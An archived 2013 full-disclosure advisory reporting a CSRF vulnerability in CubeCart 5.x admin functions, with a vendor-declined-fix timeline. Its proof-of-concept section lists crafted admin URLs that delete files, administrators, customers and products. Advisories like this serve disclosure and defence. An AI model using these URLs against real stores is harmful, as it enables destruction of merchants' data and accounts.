lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 1 Jan 2013 11:27:21 +0800
From: YGN Ethical Hacker Group <lists@...g.net>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>,
  bugtraq <bugtraq@...urityfocus.com>, secalert@...urityreason.com,
  bugs@...uritytracker.com, vuln <vuln@...unia.com>, vuln@...urity.nnov.ru,
  news@...uriteam.com, moderators@...db.org,
  submissions@...ketstormsecurity.org, submit@...ecurity.com
Subject: CubeCart 5.x | Cross Site Request Forgery (CSRF) Vulnerability

1. OVERVIEW

CubeCart 5.x versions are vulnerable to Cross Site Request Forgery (CSRF).


2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 5.x versions contain a flaw that allows a remote Cross-site
Request Forgery (CSRF / XSRF) attack. The flaw exists because the
application does not require multiple steps or explicit confirmation
for sensitive transactions for majority of administrator functions
such as adding new user, assigning user to administrative privilege.
By using a crafted URL, an attacker may trick the victim into visiting
to his web page to take advantage of the trust relationship between
the authenticated victim and the application. Such an attack could
trick the victim into executing arbitrary commands in the context of
their session with the application, without further prompting or
verification.


4. VERSIONS AFFECTED

5.x


5. Proof-of-Concept

http://localhost/admin.php?_g=documents&node=index&delete=1 (Delete
file in Site Documents)
http://localhost/admin.php?_g=filemanager&mode=digital&delete=1
(Delete file in File Manager)
http://localhost/admin.php?_g=settings&node=admins&action=edit&admin_id=2
(Delete user)
http://localhost/admin.php?_g=customers&sort%5Bregistered%5D=DESC&action=delete&customer_id=1
(Delete customer user)
http://localhost/admin.php?_g=products&sort%5Bupdated%5D=DESC&delete=1
(Delete product)
	
	
6. SOLUTION

The vendor has chosen not to fix the issue.
Workaround is not to visit malicious sites during log-in.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: Vulnerability disclosed
2012-12-24: The vendor replied that the fix would not be implemented.
2013-01-01: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5x%5D_csrf
CubeCart Home Page: http://cubecart.com/

#yehg [2013-01-01]
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ